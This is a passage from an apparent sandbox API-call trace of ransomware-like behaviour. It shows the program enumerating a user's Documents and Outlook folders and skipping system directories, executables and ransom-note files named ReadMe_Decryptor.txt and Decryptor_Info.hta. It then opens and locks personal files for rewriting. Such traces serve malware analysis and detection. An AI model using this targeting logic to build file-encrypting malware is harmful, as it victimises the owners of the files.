lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.418] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.418] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="C:\\ProgramData") returned 1 [0105.418] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0105.418] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned 1 [0105.419] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned 1 [0105.419] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 1 [0105.419] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.419] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.419] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.419] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0105.419] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="C:\\Intel") returned 1 [0105.419] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="C:\\msys32") returned 1 [0105.419] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="C:\\Qt") returned 1 [0105.419] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="C:\\ProgramData") returned 1 [0105.419] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="C:\\Program Files") returned 1 [0105.419] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="C:\\Windows") returned -1 [0105.419] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="C:\\Program Files (x86)") returned 1 [0105.419] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0105.419] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned 54 [0105.419] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72abb8 [0105.420] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.420] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.422] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.422] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.422] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0105.422] lstrcmpW (lpString1="voeimd@djhreuu.uhd.pst", lpString2=".") returned 1 [0105.422] lstrcmpW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="..") returned 1 [0105.422] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="ReadMe_Decryptor.txt") returned 1 [0105.422] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="Decryptor_Info.hta") returned 1 [0105.422] PathFindExtensionW (pszPath="voeimd@djhreuu.uhd.pst") returned=".pst" [0105.422] lstrcmpiW (lpString1=".pst", lpString2=".exe") returned 1 [0105.422] lstrcmpiW (lpString1=".pst", lpString2=".sys") returned -1 [0105.422] lstrcmpiW (lpString1=".pst", lpString2=".lnk") returned 1 [0105.422] lstrcmpiW (lpString1=".pst", lpString2=".dll") returned 1 [0105.422] lstrcmpiW (lpString1=".pst", lpString2=".msi") returned 1 [0105.422] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x7b4dc0 [0105.422] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa6) returned 0x7afde8 [0105.422] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b4dc0 | out: hHeap=0x6d0000) returned 1 [0105.422] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7b4dc0 [0105.422] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x6d0000) returned 1 [0105.422] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0105.423] FindClose (in: hFindFile=0x72abb8 | out: hFindFile=0x72abb8) returned 1 [0105.423] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1da7e720, ftCreationTime.dwHighDateTime=0x1d5dbee, ftLastAccessTime.dwLowDateTime=0xebf11160, ftLastAccessTime.dwHighDateTime=0x1d5d8f1, ftLastWriteTime.dwLowDateTime=0xebf11160, ftLastWriteTime.dwHighDateTime=0x1d5d8f1, nFileSizeHigh=0x0, nFileSizeLow=0xcdc0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="q6wmyGZdOioAEc.pptx", cAlternateFileName="Q6WMYG~1.PPT")) returned 1 [0105.423] lstrcmpW (lpString1="q6wmyGZdOioAEc.pptx", lpString2=".") returned 1 [0105.423] lstrcmpW (lpString1="q6wmyGZdOioAEc.pptx", lpString2="..") returned 1 [0105.423] lstrcmpiW (lpString1="q6wmyGZdOioAEc.pptx", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.423] lstrcmpiW (lpString1="q6wmyGZdOioAEc.pptx", lpString2="Decryptor_Info.hta") returned 1 [0105.423] PathFindExtensionW (pszPath="q6wmyGZdOioAEc.pptx") returned=".pptx" [0105.423] lstrcmpiW (lpString1=".pptx", lpString2=".exe") returned 1 [0105.423] lstrcmpiW (lpString1=".pptx", lpString2=".sys") returned -1 [0105.423] lstrcmpiW (lpString1=".pptx", lpString2=".lnk") returned 1 [0105.423] lstrcmpiW (lpString1=".pptx", lpString2=".dll") returned 1 [0105.423] lstrcmpiW (lpString1=".pptx", lpString2=".msi") returned 1 [0105.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef298 [0105.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x7afde8 [0105.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6d0000) returned 1 [0105.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b03e8 [0105.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x6d0000) returned 1 [0105.424] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda8fca00, ftCreationTime.dwHighDateTime=0x1d5dcb7, ftLastAccessTime.dwLowDateTime=0xfdd97ab0, ftLastAccessTime.dwHighDateTime=0x1d5e27f, ftLastWriteTime.dwLowDateTime=0xfdd97ab0, ftLastWriteTime.dwHighDateTime=0x1d5e27f, nFileSizeHigh=0x0, nFileSizeLow=0x8ab7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qsXQkAbnzEQwB.csv", cAlternateFileName="QSXQKA~1.CSV")) returned 1 [0105.424] lstrcmpW (lpString1="qsXQkAbnzEQwB.csv", lpString2=".") returned 1 [0105.424] lstrcmpW (lpString1="qsXQkAbnzEQwB.csv", lpString2="..") returned 1 [0105.424] lstrcmpiW (lpString1="qsXQkAbnzEQwB.csv", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.424] lstrcmpiW (lpString1="qsXQkAbnzEQwB.csv", lpString2="Decryptor_Info.hta") returned 1 [0105.424] PathFindExtensionW (pszPath="qsXQkAbnzEQwB.csv") returned=".csv" [0105.424] lstrcmpiW (lpString1=".csv", lpString2=".exe") returned -1 [0105.424] lstrcmpiW (lpString1=".csv", lpString2=".sys") returned -1 [0105.424] lstrcmpiW (lpString1=".csv", lpString2=".lnk") returned -1 [0105.424] lstrcmpiW (lpString1=".csv", lpString2=".dll") returned -1 [0105.424] lstrcmpiW (lpString1=".csv", lpString2=".msi") returned -1 [0105.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef298 [0105.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x7afde8 [0105.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6d0000) returned 1 [0105.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0470 [0105.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x6d0000) returned 1 [0105.424] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5405870, ftCreationTime.dwHighDateTime=0x1d5b2de, ftLastAccessTime.dwLowDateTime=0xe81ca9d0, ftLastAccessTime.dwHighDateTime=0x1d5be63, ftLastWriteTime.dwLowDateTime=0xe81ca9d0, ftLastWriteTime.dwHighDateTime=0x1d5be63, nFileSizeHigh=0x0, nFileSizeLow=0x3747, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tHtip4RVk.docx", cAlternateFileName="THTIP4~1.DOC")) returned 1 [0105.425] lstrcmpW (lpString1="tHtip4RVk.docx", lpString2=".") returned 1 [0105.425] lstrcmpW (lpString1="tHtip4RVk.docx", lpString2="..") returned 1 [0105.425] lstrcmpiW (lpString1="tHtip4RVk.docx", lpString2="ReadMe_Decryptor.txt") returned 1 [0105.425] lstrcmpiW (lpString1="tHtip4RVk.docx", lpString2="Decryptor_Info.hta") returned 1 [0105.425] PathFindExtensionW (pszPath="tHtip4RVk.docx") returned=".docx" [0105.425] lstrcmpiW (lpString1=".docx", lpString2=".exe") returned -1 [0105.425] lstrcmpiW (lpString1=".docx", lpString2=".sys") returned -1 [0105.425] lstrcmpiW (lpString1=".docx", lpString2=".lnk") returned -1 [0105.425] lstrcmpiW (lpString1=".docx", lpString2=".dll") returned 1 [0105.425] lstrcmpiW (lpString1=".docx", lpString2=".msi") returned -1 [0105.425] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef298 [0105.425] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x7afde8 [0105.425] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6d0000) returned 1 [0105.425] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x7afe80 [0105.425] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x6d0000) returned 1 [0105.425] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd973c920, ftCreationTime.dwHighDateTime=0x1d59ac0, ftLastAccessTime.dwLowDateTime=0xd0333fc0, ftLastAccessTime.dwHighDateTime=0x1d5d441, ftLastWriteTime.dwLowDateTime=0xd0333fc0, ftLastWriteTime.dwHighDateTime=0x1d5d441, nFileSizeHigh=0x0, nFileSizeLow=0xca9e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UYmmRCVOWVM3.pptx", cAlternateFileName="UYMMRC~1.PPT")) returned 1 [0105.425] lstrcmpW (lpString1="UYmmRCVOWVM3.pptx", lpString2=".") returned 1 [0105.425] lstrcmpW (lpString1="UYmmRCVOWVM3.pptx", lpString2="..") returned 1 [0105.425] lstrcmpiW (lpString1="UYmmRCVOWVM3.pptx", lpString2="ReadMe_Decryptor.txt") returned 1 [0105.425] lstrcmpiW (lpString1="UYmmRCVOWVM3.pptx", lpString2="Decryptor_Info.hta") returned 1 [0105.426] PathFindExtensionW (pszPath="UYmmRCVOWVM3.pptx") returned=".pptx" [0105.426] lstrcmpiW (lpString1=".pptx", lpString2=".exe") returned 1 [0105.426] lstrcmpiW (lpString1=".pptx", lpString2=".sys") returned -1 [0105.426] lstrcmpiW (lpString1=".pptx", lpString2=".lnk") returned 1 [0105.426] lstrcmpiW (lpString1=".pptx", lpString2=".dll") returned 1 [0105.426] lstrcmpiW (lpString1=".pptx", lpString2=".msi") returned 1 [0105.426] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef298 [0105.426] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x7afde8 [0105.426] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6d0000) returned 1 [0105.426] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b04f8 [0105.426] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x6d0000) returned 1 [0105.426] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22981ee0, ftCreationTime.dwHighDateTime=0x1d5d512, ftLastAccessTime.dwLowDateTime=0xd7a61ca0, ftLastAccessTime.dwHighDateTime=0x1d568fd, ftLastWriteTime.dwLowDateTime=0xd7a61ca0, ftLastWriteTime.dwHighDateTime=0x1d568fd, nFileSizeHigh=0x0, nFileSizeLow=0x6a2c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y5rr_tZTBD06B8p.xlsx", cAlternateFileName="Y5RR_T~1.XLS")) returned 1 [0105.426] lstrcmpW (lpString1="y5rr_tZTBD06B8p.xlsx", lpString2=".") returned 1 [0105.426] lstrcmpW (lpString1="y5rr_tZTBD06B8p.xlsx", lpString2="..") returned 1 [0105.426] lstrcmpiW (lpString1="y5rr_tZTBD06B8p.xlsx", lpString2="ReadMe_Decryptor.txt") returned 1 [0105.426] lstrcmpiW (lpString1="y5rr_tZTBD06B8p.xlsx", lpString2="Decryptor_Info.hta") returned 1 [0105.426] PathFindExtensionW (pszPath="y5rr_tZTBD06B8p.xlsx") returned=".xlsx" [0105.426] lstrcmpiW (lpString1=".xlsx", lpString2=".exe") returned 1 [0105.426] lstrcmpiW (lpString1=".xlsx", lpString2=".sys") returned 1 [0105.426] lstrcmpiW (lpString1=".xlsx", lpString2=".lnk") returned 1 [0105.426] lstrcmpiW (lpString1=".xlsx", lpString2=".dll") returned 1 [0105.427] lstrcmpiW (lpString1=".xlsx", lpString2=".msi") returned 1 [0105.427] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef298 [0105.427] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x7afde8 [0105.427] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6d0000) returned 1 [0105.427] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0580 [0105.427] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x6d0000) returned 1 [0105.427] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97389c10, ftCreationTime.dwHighDateTime=0x1d5de05, ftLastAccessTime.dwLowDateTime=0x79cc1280, ftLastAccessTime.dwHighDateTime=0x1d5da25, ftLastWriteTime.dwLowDateTime=0x79cc1280, ftLastWriteTime.dwHighDateTime=0x1d5da25, nFileSizeHigh=0x0, nFileSizeLow=0x1255a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YXKYisSII 8q.docx", cAlternateFileName="YXKYIS~1.DOC")) returned 1 [0105.427] lstrcmpW (lpString1="YXKYisSII 8q.docx", lpString2=".") returned 1 [0105.427] lstrcmpW (lpString1="YXKYisSII 8q.docx", lpString2="..") returned 1 [0105.427] lstrcmpiW (lpString1="YXKYisSII 8q.docx", lpString2="ReadMe_Decryptor.txt") returned 1 [0105.427] lstrcmpiW (lpString1="YXKYisSII 8q.docx", lpString2="Decryptor_Info.hta") returned 1 [0105.427] PathFindExtensionW (pszPath="YXKYisSII 8q.docx") returned=".docx" [0105.427] lstrcmpiW (lpString1=".docx", lpString2=".exe") returned -1 [0105.427] lstrcmpiW (lpString1=".docx", lpString2=".sys") returned -1 [0105.427] lstrcmpiW (lpString1=".docx", lpString2=".lnk") returned -1 [0105.427] lstrcmpiW (lpString1=".docx", lpString2=".dll") returned 1 [0105.521] lstrcmpiW (lpString1="mui", lpString2=".msi") returned 1 [0105.521] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef368 [0105.521] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef300 [0105.521] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef368 | out: hHeap=0x6d0000) returned 1 [0105.521] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2bb16a0, ftCreationTime.dwHighDateTime=0x1d5d7ff, ftLastAccessTime.dwLowDateTime=0xa81b1550, ftLastAccessTime.dwHighDateTime=0x1d5da25, ftLastWriteTime.dwLowDateTime=0xa81b1550, ftLastWriteTime.dwHighDateTime=0x1d5da25, nFileSizeHigh=0x0, nFileSizeLow=0x74d9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z-Vb.rtf", cAlternateFileName="")) returned 1 [0105.521] lstrcmpW (lpString1="Z-Vb.rtf", lpString2=".") returned 1 [0105.521] lstrcmpW (lpString1="Z-Vb.rtf", lpString2="..") returned 1 [0105.522] lstrcmpiW (lpString1="Z-Vb.rtf", lpString2="ReadMe_Decryptor.txt") returned 1 [0105.522] lstrcmpiW (lpString1="Z-Vb.rtf", lpString2="Decryptor_Info.hta") returned 1 [0105.522] PathFindExtensionW (pszPath="Z-Vb.rtf") returned=".rtf" [0105.522] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0105.522] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0105.522] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0105.522] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0105.522] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0105.522] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef368 [0105.522] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x7590d8 [0105.522] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef368 | out: hHeap=0x6d0000) returned 1 [0105.522] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x759170 [0105.522] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7590d8 | out: hHeap=0x6d0000) returned 1 [0105.522] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x736b0fd0, ftCreationTime.dwHighDateTime=0x1d58c56, ftLastAccessTime.dwLowDateTime=0xc475a6c0, ftLastAccessTime.dwHighDateTime=0x1d5e7d6, ftLastWriteTime.dwLowDateTime=0xc475a6c0, ftLastWriteTime.dwHighDateTime=0x1d5e7d6, nFileSizeHigh=0x0, nFileSizeLow=0x143f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_3Q0x_8s.docx", cAlternateFileName="_3Q0X_~1.DOC")) returned 1 [0105.522] lstrcmpW (lpString1="_3Q0x_8s.docx", lpString2=".") returned 1 [0105.522] lstrcmpW (lpString1="_3Q0x_8s.docx", lpString2="..") returned 1 [0105.522] lstrcmpiW (lpString1="_3Q0x_8s.docx", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.522] lstrcmpiW (lpString1="_3Q0x_8s.docx", lpString2="Decryptor_Info.hta") returned -1 [0105.523] PathFindExtensionW (pszPath="_3Q0x_8s.docx") returned=".docx" [0105.523] lstrcmpiW (lpString1=".docx", lpString2=".exe") returned -1 [0105.523] lstrcmpiW (lpString1=".docx", lpString2=".sys") returned -1 [0105.523] lstrcmpiW (lpString1=".docx", lpString2=".lnk") returned -1 [0105.523] lstrcmpiW (lpString1=".docx", lpString2=".dll") returned 1 [0105.523] lstrcmpiW (lpString1=".docx", lpString2=".msi") returned -1 [0105.523] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef368 [0105.523] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x7590d8 [0105.523] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef368 | out: hHeap=0x6d0000) returned 1 [0105.523] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x7591e8 [0105.523] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7590d8 | out: hHeap=0x6d0000) returned 1 [0105.523] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x736b0fd0, ftCreationTime.dwHighDateTime=0x1d58c56, ftLastAccessTime.dwLowDateTime=0xc475a6c0, ftLastAccessTime.dwHighDateTime=0x1d5e7d6, ftLastWriteTime.dwLowDateTime=0xc475a6c0, ftLastWriteTime.dwHighDateTime=0x1d5e7d6, nFileSizeHigh=0x0, nFileSizeLow=0x143f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_3Q0x_8s.docx", cAlternateFileName="_3Q0X_~1.DOC")) returned 0 [0105.523] FindClose (in: hFindFile=0x77d698 | out: hFindFile=0x77d698) returned 1 [0105.524] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Z-xFMuafWn712Plg.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8z-xfmuafwn712plg.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.524] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0xf67f [0105.524] LockFile (hFile=0x118, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xf79f, nNumberOfBytesToLockHigh=0x0) returned 1 [0105.524] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.524] ReadFile (in: hFile=0x118, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0105.526] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.526] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200023) returned 0x2b80020 [0105.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b9e8 [0105.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0105.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72b5e0 [0105.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7ab0 [0105.760] GetLastError () returned 0x0 [0105.760] SetLastError (dwErrCode=0x0) [0105.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b5e0 | out: hHeap=0x6d0000) returned 1 [0105.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf6a2) returned 0x71a658 [0105.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7ab0 | out: hHeap=0x6d0000) returned 1 [0105.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0540 [0105.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75b800 [0105.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0540 | out: hHeap=0x6d0000) returned 1 [0105.761] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b9e8 [0105.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b9f8 [0105.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0105.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b9e8 [0105.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9f8 | out: hHeap=0x6d0000) returned 1 [0105.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b9f8 [0105.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9e8 | out: hHeap=0x6d0000) returned 1 [0105.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b9e8 [0105.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b9f8 | out: hHeap=0x6d0000) returned 1 [0105.761] RtlAllocateHeap (HeapHandle=0x6d0000, 